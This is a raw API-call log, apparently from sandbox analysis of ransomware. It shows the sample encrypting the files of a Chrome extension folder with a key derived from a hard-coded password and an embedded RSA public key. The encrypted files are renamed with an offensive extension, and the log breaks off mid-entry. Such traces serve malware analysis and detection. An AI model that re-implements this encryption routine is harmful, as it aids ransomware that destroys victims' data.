(lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), bFailIfExists=0) returned 1 [0252.736] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png", dwFileAttributes=0x0) returned 1 [0252.736] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.gsg")) returned 1 [0252.738] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.fuck")) returned 1 [0252.739] CryptDestroyHash (hHash=0x2985a20) returned 1 [0252.739] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.739] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.739] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.739] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0252.739] GetLastError () returned 0x0 [0252.739] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html")) returned 0x20 [0252.739] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html", dwFileAttributes=0x80) returned 1 [0252.740] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.740] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.741] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg", dwFileAttributes=0x2) returned 1 [0252.741] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x298a040) returned 1 [0252.743] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0252.744] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.744] CryptHashData (hHash=0x2985a20, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.744] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29846a0) returned 1 [0252.744] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.744] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0252.744] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x298c680) returned 1 [0252.745] CryptImportPublicKeyInfo (in: hCryptProv=0x298c680, dwCertEncodingType=0x1, pInfo=0x2993610*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993640*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993648*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984c60) returned 1 [0252.745] CryptEncrypt (in: hKey=0x2984c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0252.745] CryptEncrypt (in: hKey=0x2984c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298cf88*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x298cf88*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0252.745] WriteFile (in: hFile=0x5d64, lpBuffer=0x298cf88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x298cf88*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0252.746] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5c, lpOverlapped=0x0) returned 1 [0252.747] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0252.747] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0252.747] CloseHandle (hObject=0x5d50) returned 1 [0252.747] CloseHandle (hObject=0x5d64) returned 1 [0252.748] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), bFailIfExists=0) returned 1 [0252.751] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html", dwFileAttributes=0x0) returned 1 [0252.751] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.gsg")) returned 1 [0252.753] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.fuck")) returned 1 [0252.754] CryptDestroyHash (hHash=0x2985a20) returned 1 [0252.754] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.754] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.754] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.754] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0252.754] GetLastError () returned 0x0 [0252.754] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js")) returned 0x20 [0252.754] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js", dwFileAttributes=0x80) returned 1 [0252.755] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.756] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.756] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg", dwFileAttributes=0x2) returned 1 [0252.757] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x298d010) returned 1 [0252.759] CryptCreateHash (in: hProv=0x298d010, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0252.759] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.759] CryptHashData (hHash=0x2985a20, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.759] CryptDeriveKey (in: hProv=0x298d010, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29846a0) returned 1 [0252.759] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.759] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0252.759] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x298d2b8) returned 1 [0252.760] CryptImportPublicKeyInfo (in: hCryptProv=0x298d2b8, dwCertEncodingType=0x1, pInfo=0x2993200*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993230*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993238*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984860) returned 1 [0252.760] CryptEncrypt (in: hKey=0x2984860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0252.760] CryptEncrypt (in: hKey=0x2984860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298d340*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x298d340*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0252.761] WriteFile (in: hFile=0x5d50, lpBuffer=0x298d340*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x298d340*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0252.762] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x5f, lpOverlapped=0x0) returned 1 [0252.763] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x5f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x60) returned 1 [0252.763] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x60, lpOverlapped=0x0) returned 1 [0252.763] CloseHandle (hObject=0x5d64) returned 1 [0252.763] CloseHandle (hObject=0x5d50) returned 1 [0252.763] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), bFailIfExists=0) returned 1 [0252.767] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js", dwFileAttributes=0x0) returned 1 [0252.767] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.gsg")) returned 1 [0252.769] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.fuck")) returned 1 [0252.770] CryptDestroyHash (hHash=0x2985a20) returned 1 [0252.770] CryptDestroyKey (hKey=0x29846a0) returned 1 [0252.770] CryptReleaseContext (hProv=0x298d010, dwFlags=0x0) returned 1 [0252.770] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.770] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0252.770] GetLastError () returned 0x0 [0252.770] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json")) returned 0x20 [0252.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0252.771] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.772] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.772] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0252.773] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x298a040) returned 1 [0252.775] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0252.775] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0252.775] CryptHashData (hHash=0x2985ba0, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.775] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29846a0) returned 1 [0252.775] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.779] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0252.780] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x298c9b0) returned 1 [0252.780] CryptImportPublicKeyInfo (in: hCryptProv=0x298c9b0, dwCertEncodingType=0x1, pInfo=0x2993af0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993b20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993b28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2984aa0) returned 1 [0252.780] CryptEncrypt (in: hKey=0x2984aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0252.781] CryptEncrypt (in: hKey=0x2984aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298cbd0*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x298cbd0*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0252.781] WriteFile (in: hFile=0x5d64, lpBuffer=0x298cbd0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x298cbd0*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0252.782] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2d6, lpOverlapped=0x0) returned 1 [0252.796] CryptEncrypt (in: hKey=0x29846a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2e0) returned 1 [0252.796] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2e0, lpOverlapped=0x0) returned 1 [0252.885] CloseHandle (hObject=0x5d50) returned 1 [0252.886] CloseHandle (hObject=0x5d64) returned 1 [0252.886] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), bFailIfExists=0) returned 1 [0252.889] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0252.890] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 